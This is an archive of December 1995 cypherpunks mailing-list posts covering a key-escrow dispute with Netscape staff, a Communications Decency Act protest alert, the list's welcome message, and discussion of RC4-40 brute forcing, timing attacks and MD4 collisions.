> may be willing to obey the laws if they require GAK, but I do not feel
> that they are just rolling over either.  I strongly oppose GAK, but I
> do not believe that no crypto is better than GAK crypto.  I would
> rather keep some people out than nobody out.

Your ignorance is assuming that the options you present are the only 
options available.  JW made the same mistake.  In logical discourse this 
is called "narrowing the field."  It's a version of the 'straw man' 
and a classic flaw in logical argument.
 
> Dan Weinstein
> djw@pdcorp.com
> http://www.earthlink.net/~danjw
> PGP public key is available from my Home Page.
> All opinions expressed above are mine.
> 
> "I understand by 'freedom of Spirit' something quite definite -
> the unconditional will to say No, where it is dangerous to say
> No.    

This has got to be the most ironic of signatures I have ever seen.

Why don't you begin to apply the cute quotes you put in your .sig to real 
life and tell Netscape to grow a backbone and say 'No.' to GAK?
    
>            Friedrich Nietzsche

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 1995 20:00:06 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <30C162DD.1E2F@netscape.com>
Message-ID: <Pine.SUN.3.91.951203063154.24122F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:
> > I just get sick of those who tout themselves as Experts in Software
> > Munitions and are in fact are merely in it for the cash.  In it for the
> > cash is just fine.  Just don't tell me later you aren't.
> 
>   Can't I be a supporter of strong crypto, and also be in it for the money?
> Many people here make good money off of crypto related work.  If I'm asked
> to implement GAK in a situation where it is not mandated by law, I won't
> do it.

You can be a supporter of strong crypto, and be in it for the money.  I 
do not believe you can be a supporter of strong crypto and not fight GAK 
tooth and nail, which I just don't see you doing.  Sure, you will obey 
the law, but will you do anything to influence it's development.

All insult and prodding aside, really ask yourself this.

You've been GIFTED with a position of immense political power and a 
strong and virbrant voice.  Why aren't you using it?  I know the answer 
because I've talked to the attornies.  Do YOU know it?

> > > I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal
> > > on the actual issue of whether Netscape will build a U.S.-supported GAK (as
> > > opposed to offering GAK for the Iraqis or French). I await with interest
> > > the clarification of the anti-GAK stance that Jeff alluded to.
> > 
> > I believe you got it with:
> > 
> > "If the law requires GAK, then I believe that we will implement it rather
> > than just disable encryption."
> 
>   Tim was referring to the position statement against GAK that we will be
> releasing before the NIST meeting next week.

I think it's clear what you will say at NIST, and exactly what is has to 
do with Netscape's real position on the issue.

> 
> > Note that the phrase is entirely ambigious on whether this refers to the
> > law requiring GAK for export, or export AND domestic sales.  Netscape
> > will install GAK into whatever will increase its sales.  I understand
> > and respect this position in the context of a company which needs
> > badly to start raking in some profits.
> 
>   What I meant, and have said in other places, is that if it is legal to
> ship a product without GAK for use inside the US, or anywhere else,
> I believe we will do it, because that is what our customers want.

What you have ignored, and ignored in other places, is the fact the 
Netscape has a good deal of clout today.  If you were really for strong 
crypto, why aren't you using it, why isn't Netscape using it, to cripple 
GAK, and entirely doable endeavor, rather than just seeking some 
redundant 'clarification' of the current law, (which even it it's most 
mild intrepretation is below the threshold of acceptable to any strong 
crypto advocate)?

More to the point, why are you telling us what a strong crypto supporter 
you are instead of SHOWING us?

> > The title "Software Munitions Expert" or similar such should probably be
> > changed to "GAK marketing expert" however.
> 
>   I'm sorry my dig at the ITAR does not ammuse you.

I find it very amusing and clever.  I just don't think it's a title you 
deserve.

  Your suggested
> replacement would not be appropriate since I don't support GAK (I believe
> that it is one of the most evil things any government could do to its
> citizens),

So let's see some energy and action that supports that position.  Talk is 
cheap.

 and I'm not in marketing.

You missed your calling.  You've got Mr. Weinstein hanging on your every 
word.

> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 3 Dec 1995 19:59:31 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: unwanted AIP mail?
In-Reply-To: <199512022323.AAA00288@utopia.hacktic.nl>
Message-ID: <Pine.BSD.3.91.951203003505.27625A-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   AIP news list is rather privileged --it is run by the American Physical
Society. It is an advanced lisiting of research projects which may have a
breakthrough, basically inviting other physicists to corroborate disprove,
or preferably augment their basic research. 

   I am a member of the society, which is rather staid.

   The list is a standard "listproc" which should accept the indirect 
command on the first message line:

unsubscribe physnews cypherpunks@toad.com


On Sun, 3 Dec 1995, Anonymous wrote:

> Anyone else suddenly start hearing from these folks?
> 
> >  Date: Fri, 1 Dec 95 14:44:34 EST
> >  From: physnews@aip.org (AIP listserver)
> >  Message-Id: <9512011944.AA12171@aip.org>
> >  To: physnews-mailing@aip.org
> >  Subject: update.250
> >  X-UIDL: 817946091.001
> >  
> >  PHYSICS NEWS UPDATE                         
> >  The American Institute of Physics Bulletin of Physics News
> >  Number 250 December 1, 1995       by Phillip F. Schewe and Ben
> >  Stein
> >  
> >  TWO-BIT QUANTUM LOGIC GATES have been experimentally {...}
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Sun, 3 Dec 1995 12:09:54 +0800
To: cypherpunks@toad.com
Subject: bulk RC4 brute forcing
Message-ID: <199512030356.OAA17497@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Some time ago, I wrote about testing multiple plain/cipher pairs against a
key as a possible speed up for brute forcing 40 bit RC4 key cracking.

I have finally done something about it, written some code, and run tests
which I believe gives a about 6-8 times improvement over single
key/plain/cipher testing against RC4-40 encryption.

Basically:
A single RC4 master "key schedule" is generated.
This is copied to an master array of 126 RC4_keys (126 chosen due to segment
boundary probs).
Then each of 126 plain/cipher (P/C) pairs are tested for a match. Acquiring
the plain/cipher pairs in real life is another question.
If a match is found, the pair is marked 'found', and testing continues on
the remaining unfound P/C pairs.
This loops until all 126 plain/cipher/keys have been tested and found.
8 plaintext, 8 cipher bytes are used. Keys are 8 bytes, the last 5 of which
are variable (40 bits).

Test results :
A test set of data was created by incrementing a key byte, and making a P/C
pair.
Then all keys bytes are set to 0, and testing commenced.
Typically, a 486/33 with the above in 'C' code running on DOS achieves about
15000 tests per second.
One extended test ran about 480 million tests in 7.5 hours and found 68% of
the keys - approx 17,700/sec, averaging 5.6 million tests per found key.

My reasoning follows thus:
For 126 plain/cipher pairs, with "randomly" generated keys, one valid
key/plain/cipher pairs 'should' be located in 2^33 key tries (126 is approx.
2^7)
15000 tests/sec across 126 P/C pairs is about 119 keys/second tested.
at 119/second, 2^33 key tests will take 835 days. This should "guarantee"
a key match is found.
By contrast: 
The "bruterc4.c" code used by this forum earlier showed approximately 2200
key tests per second on my machine. Testing 2^40 keys at 2200/sec will take
5784 days to guarantee a key match (using 2^39, 2892 days).
This is a 6.9(3.46) ratio, that finds a single key match.
Finding all 126 keyswould should take approximately 293 years in "bulk"
mode, or 1996 years in single mode (126x5784 days).

The code is available, and will be posted here is desired (it is messy).

Ideally, faster key/plain/cipher testing could be accomplished if a larger
array of keys could be used. The Intel segment problem has prevented me for
making larger arrays - I don't know how to turn these features in my
compiler (yes - I am a beginner at coding, but the "huge" directive in
Borland C did not seem to work, and I don't know why - yet). 
Tests on 31, 63 and 126 P/C pairs showed results of 10689, 13326 and 15689
tests/sec, respectively. This indicates array size has a direct relationship
with test/sec.

I invite others who can better manipulate statistics, or better exeprienced,
to comment, refute, or otherwise contribute to this.

lyal
All mistakes in this message belong to me - you should not use them!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Dec 1995 11:00:50 +0800
To: cypherpunks@toad.com
Subject: Re: DigiCash releases protocol specs!
Message-ID: <9512012324.AA01808@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  By popular request, DigiCash is releasing the protocol specs.

Three cheers to DigiCash, Mark Twain, and Lucky!

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sarah Thompson <righter@aros.net>
Date: Tue, 12 Dec 1995 06:02:58 +0800
To: utah-firearms@xmission.xmission.com
Subject: ALERT:INTERNET DAY OF PROTEST TUESDAY DECEMBER 12, 1995 (fwd)
Message-ID: <199512100901.CAA15767@terra.aros.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 10 Dec 1995 01:44:01 -0700
>From: molly@aros.net
>Subject: ALERT:INTERNET DAY OF PROTEST TUESDAY DECEMBER 12, 1995 (fwd)
>To: andelain@aros.net, matti@community.net, CAPSTACK_T@MSdisk.WUstl.EDU,
>        will@btsslc.com
>
>
>========================================================================
>     CAMPAIGN TO STOP THE NET CENSORSHIP LEGISLATION IN CONGRESS
>
>    On Tuesday December 12, 1995, Join With Hundreds of Thousands
>                  Of Your Fellow Internet Users In
>
>                  A NATIONAL INTERNET DAY OF PROTEST
>
>      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
>                REDISTRIBUTE ONLY UNTIL December 20, 1995
>________________________________________________________________________
>CONTENTS
>        Internet Day of Protest: Tuesday December 12, 1995
>        What You Must Do On Tuesday December 12, 1995
>        List of Participating Organizations
>        Where Can I Learn More?
>
>________________________________________________________________________
>INTERNET DAY OF PROTEST:  TUESDAY DECEMBER 12, 1995
>
>Outrageous proposals to censor the Internet demand that the Internet
>Community take swift and immediate action. We must stand up and let
>Congress know that we will not tolerate their attempts to destroy this
>medium! Please join hundreds of thousands of your fellow citizens in a
>National Day of Protest on Tuesday December 12, 1995.
>
>As you know, on Wednesday December 6, 1995, the House Conference
>Committee on Telecommunications Reform voted to impose far reaching and
>unconstitutional "indecency" restrictions on the Internet and other
>interactive media, including large commercial online services (such as
>America Online, Compuserve, and Prodigy) and smaller Internet Service
>Providers such as Panix, the Well, Echo, and Mindvox.
>
>These restrictions threaten the very existence of the Internet and
>interactive media as a viable medium for free expression, education,
>commerce.  If enacted, the Internet as we know it will never be the
>same.
>
>Libraries will not be able to put any books online that might
>offend a child somewhere.  No "Catcher in the Rye" or "Ulysses" on the net.
>Internet Service Providers could face criminal penalties for allowing
>children to subscribe to their Internet Services, forcing many  small
>companies to simply refuse to sell their services to anyone under 18. Worst
>of all, everything you say and publish on the net will have to be "dumbed
>down" to that which is acceptable to a child.
>
>As Internet users, we simply must not allow this assault against the
>Internet and our most basic freedoms to go unchallenged.
>
>On Tuesday December 12, the organizations below are urging you to
>join us in a NATIONAL DAY OF PROTEST. The goal is to flood key members of
>the House and Senate with phone calls, faxes and email with the message
>that the Internet community WILL NOT TOLERATE Congressional attempts to
>destroy the Internet, limit our freedoms and trample on our rights.
>
>Below are the phone, fax, and email address of several key members of
>Congress on this issue and instructions on what you can do to join the
>National Day of Protest to save the Net.
>
>______________________________________________________________________
>WHAT YOU MUST DO ON TUESDAY DECEMBER 12, 1995
>
>1. Throughout the day Tuesday December 12, please contact as many
>   members of Congress on the list below as you can. If you are only
>   able to make one call, contact House Speaker Newt Gingrich. Finally,
>   if the Senator or Representative from your state is on the list
>   below, be sure to contact him or her also.
>
>2. Urge each Member of Congress to "stop the madness".  Tell them that
>   they are about to pass legislation that will destroy the Internet as
>   an educational and commercial medium.  If you are at a loss for
>   words, try the following sample communique:
>
>   Sample phone call:
>
>        Both the House and Senate bills designed to protect children
>        from objectionable material on the Internet will actually
>        destroy the Internet as an medium for education, commerce, and
>        political discourse. There are other, less restrictive ways to
>        address this issue.
>
>        I urge you to oppose both measures being proposed in the
>        conference committee.  This is an important election issue to
>        me.
>
>   Sample letter (fax or email):
>
>        The Senate conferees are considering ways to protect children
>        from inappropriate material on the Internet.  A vote for either
>        the House or Senate proposals will result in the destruction of
>        the Internet as a viable medium for free expression, education,
>        commerce.  Libraries will not be able to put their entire book
>        collections online.  Everyday people like me will risk massive
>        fines and prison sentences for public discussions someone s
>        somewhere might consider "indecent".
>
>        There are other, less restrictive ways to protect children from
>        objectionable material online. This is an important election
>        issue to me.
>
>3. If you're in San Francisco, or near enough to get there, go to
>   the Rally Against Censorship from Ground Zero of the Digital Revolution:
>
>   WHEN: Monday, December 11, 1995  12:00 - 1:00 PM
>   WHERE: South Park (between 2nd and 3rd, Bryant and Brannon) San Francisco.
>   SPEAKERS: To be announced
>   BRING: Attention-grabbing posters, signs, and banners that demonstrate
>        your committment to free speech and expression, and your feelings
>        about Congress.
>   FOR UPDATED INFORMATION (including rain info):
>        http://www.hotwired.com/staff/digaman/
>
>
>### THIS IS VERY IMPORTANT ###
>
>4. Mail a note to protest@vtw.org to let us know you did your part.
>   Although you will not receive a reply due to the number of
>   anticipated responses, we'll be counting up the number of people that
>   participated in the day of protest.
>
>
>      P ST Name and Address           Phone           Fax
>      = == ========================   ==============  ==============
>      R AK Stevens, Ted               1-202-224-3004  1-202-224-1044
>      R AZ McCain, John               1-202-224-2235  1-602-952-8702
>        senator_mccain@mccain.senate.gov
>      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
>      R KS Dole, Robert               1-202-224-6521  1-202-228-1245
>      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
>        wendell_ford@ford.senate.gov
>      R MS Lott, Trent                1-202-224-6253  1-202-224-2262
>      R MT Burns, Conrad R.           1-202-224-2644  1-202-224-8594
>        conrad_burns@burns.senate.gov
>      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
>      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
>        senator@hollings.senate.gov
>      R SD Pressler, Larry            1-202-224-5842  1-202-224-1259
>        larry_pressler@pressler.senate.gov
>      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
>        senator_gorton@gorton.senate.gov
>      D WV Rockefeller, John D.       1-202-224-6472  n.a.
>        senator@rockefeller.senate.gov
>
>   Dist ST Name, Address, and Party     Phone            Fax
>   ==== == ========================     ==============  ==============
>      6 GA Gingrich, Newt (R)           1-202-225-4501   1-202-225-4656
>             2428 RHOB                      georgia6@hr.house.gov
>     14 MI Conyers Jr., John (D)        1-202-225-5126   1-202-225-0072
>             2426 RHOB                      jconyers@hr.house.gov
>      1 CO Schroeder, Patricia (D)      1-202-225-4431   1-202-225-5842
>             2307 RHOB
>     18 TX Jackson-Lee, Sheila (D)      1-202-225-3816   1-202-225-3317
>             1520 LHOB
>      6 TN Gordon, Bart (D)             1-202-225-4231   1-202-225-6887
>             2201 RHOB
>
>
>4. Forward this alert to all of your wired friends.
>
>________________________________________________________________________
>WHERE CAN I LEARN MORE?
>
>At this moment, there are several organizations with WWW sites that now
>have, or will have, information about the net censorship legislation and
>the National Day Of Protest:
>
>American Civil Liberties Union (ftp://ftp.aclu.org/aclu/)
>Center for Democracy and Technology (http://www.cdt.org/)
>Electronic Frontier Foundation (http://www.eff.org/)
>Electronic Privacy Information Center (http://www.epic.org/)
>Wired Magazine (http://www.hotwired.com/special/indecent/)
>Voters Telecommunications Watch (http://www.vtw.org/)
>
>________________________________________________________________________
>LIST OF PARTICIPATING ORGANIZATIONS
>
>In order to use the net more effectively, several organizations have
>joined forces on a single Congressional net campaign to stop the
>Communications Decency Act.
>
>
>American Civil Liberties Union * American Communication Association *
>American Council for the Arts * Arts & Technology Society * Association
>of Alternative Newsweeklies * biancaTroll productions * Boston
>Coalition for Freedom of Expression * Californians Against Censorship
>Together * Center For Democracy And Technology * Centre for Democratic
>Communications * Center for Public Representation * Citizen's Voice -
>New Zealand * Cloud 9 Internet *Computer Communicators Association *
>Computel Network Services * Computer Professionals for Social
>Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
>Lounge * Dorsai Embassy * Dutch Digital Citizens' Movement * ECHO
>Communications Group, Inc. * Electronic Frontier Canada * Electronic
>Frontier Foundation * Electronic Frontier Foundation - Austin *
>Electronic Frontiers Australia * Electronic Frontiers Houston *
>Electronic Frontiers New Hampshire * Electronic Privacy Information
>Center * Feminists For Free Expression * First Amendment Teach-In *
>Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising
>Services * Friendly Anti-Censorship Taskforce for Students * Hands
>Off!  The Net * Inland Book Company * Inner Circle Technologies, Inc. *
>Inst. for Global Communications * Internet On-Ramp, Inc. * Internet
>Users Consortium * Joint Artists' and Music Promotions Political Action
>Committee * The Libertarian Party * Marijuana Policy Project *
>Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party *
>National Bicycle Greenway * National Campaign for Freedom of Expression
>* National Coalition Against Censorship * National Gay and Lesbian Task
>Force * National Public Telecomputing Network * National Writers Union
>* Oregon Coast RISC * Panix Public Access Internet * People for the
>American Way * Republican Liberty Caucus * Rock Out Censorship *
>Society for Electronic Access * The Thing International BBS Network *
>The WELL * Voters Telecommunications Watch
>
>(Note: All 'Electronic Frontier' organizations are independent entities,
> not EFF chapters or divisions.)
>
>________________________________________________________________________
>        End Alert
>========================================================================
>
>
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                         Paula Davidson
>                  mesoelectronic hunter/gatherer
>      davidson@cs.unca.edu    http://www.cs.unca.edu/~davidson/
>  Specializing in Exploration and Tool Use on the Matrix of the Net
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>
>
>
>
><----  End Forwarded Message  ---->
>
>
>
Sarah Thompson, M.D.
righter@aros.net
Executive Director, Women Against Gun Control
PO Box 271307
Salt Lake City, UT 84127-1307
(801)328-9660 - voice
(801)966-7278 - fax






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Mon, 11 Dec 1995 16:11:36 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <9512110810.AA08978@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Mon, 11 Dec 1995 16:10:53 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <9512110810.AA08979@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks Cypherpunks Mailing List <cypher@infinity.nus.sg>

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 11:35:32 +0800
To: cypherpunks@toad.com
Subject: Re: Time-based cryptanalysis: How to defeat it?
Message-ID: <199512110854.AAA14652@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:56 PM 12/10/95 -0800, anonymous-remailer wrote:
>Assuming Alice is decrypting a secret message sent to her
>by Bob (on her very slow C64 ;), and Mallet is watching
>with a stopwatch in hand, hoping to determine Alice's secret
>key...

The modern equivalent of that very slow C64 is the smartcard/
electronic wallet.  Sounds like we'll have to implement them
very carefully....

>It would be good to place inside the decryption routines
>a timer (WELL PLACED!) that waits a random-number of cycles
>(based on key-strokes, mouse position, etc.) to defeat this
>type of cryptanalysis?

The most interesting detail in the paper, to me, was:

PK> Computing optional Ri+1 calculations regardless of whether the exponent 
PK> bit is set does not work and can actually make the attack easier;
PK> the computations still diverge but attackers no longer have to identify
PK> the lack of a correlation for adjacent zero exponent bits. 

My immediate reaction to the description of the timing attack on 
Diffie-Hellman had, of course, been to do precisely that :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 12 Dec 1995 11:35:39 +0800
To: cypherpunks@toad.com
Subject: MD4 weaknesses (Was: Windows .PWL cracker implemented as a Word Basic virus)
Message-ID: <199512110901.BAA14965@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 PM 12/10/95 -0500, daw@quito.CS.Berkeley.EDU (David A Wagner) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article <95Dec10.175318edt.1732@cannon.ecf.toronto.edu>,
>SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu> wrote:
>> My understanding was that MD4 had been broken once, at the cost of 
>> much computer time.
>Not *that* much computer time...
>In my copy of Hans Dobbertin's paper, the abstract says 
>
>``An implementation of our 
>attack allows to find collisions for MD4 in less than a minute on a PC.''
>
>As far as I know, the difficulty of inverting MD4 is still an open
>problem -- but why would you want to use a broken algorithm like MD4
>when you can use MD2, MD5, or SHA?

Do you have a reference to Dobbertin's paper?

Schneier's discussion of MD4 says that DeBoor and Bosselaers cryptanalyzed
the last two of the three rounds of MD4 in 1991, Merkle did the first two,
and Biham discussed a differential attack on the first two, but nobody
had done the whole thing.  Does Dobbertin's attack take one of these
and use it to feed an otherwise-brute-force search?
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Mon, 11 Dec 1995 18:27:46 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <30CC02F5.4487@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Young wrote:
> 
> I for one will probably add a flag for conditional compilation of my
> bignumber library so that it will take constant time.  This may be a
> %10 slow down (using small windows exponentiation) which is trivial
> compared to the %30 speedup I will probably get when I implement a
> faster mod function :-).

Careful.  Even if you can make the number of executed instructions the
same, you still have to worry about timing differences due to branches
and the way the hardware multiplier handles different operands.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Donelan <SEAN@SDG.DRA.COM>
Date: Mon, 11 Dec 1995 16:59:51 +0800
To: cypherpunks@toad.com
Subject: Questions for Mark Twain Banks
Message-ID: <951211023756.e5b@SDG.DRA.COM>
MIME-Version: 1.0
Content-Type: text/plain


The St. Louis Internet Users Group is doing a meeting on digital cash
on Monday, Dec. 11.  Since Mark Twain Banks is located in St. Louis,
they've been invited to send a few speakers on the topic.

Any choice questions?
-- 
Sean Donelan, Data Research Associates, Inc, St. Louis, MO
  Affiliation given for identification not representation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 12 Dec 1995 05:53:30 +0800
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <30CC0D31.293C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> So while this is a very nice piece of work, and certainly of
> theoretical interest, I don't think it will modify the way in
> which people are advised to utilize cryptographic software, or
> cause companies like Netscape of RSADSI to shed any tears.

  While an exploit of this attack against our software has not
been demonstrated, and there is some debate about whether it
will even work, we are taking it very seriously.  We've been
working with Paul to develop a fix, which we will implement
even if the attack is never proven effective against our software.

	--Jeff

PS - I think Paul was a bit surprised when Jim Barksdale pulled
out his wallet and handed him 10 crisp $100 bills.  :-)
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
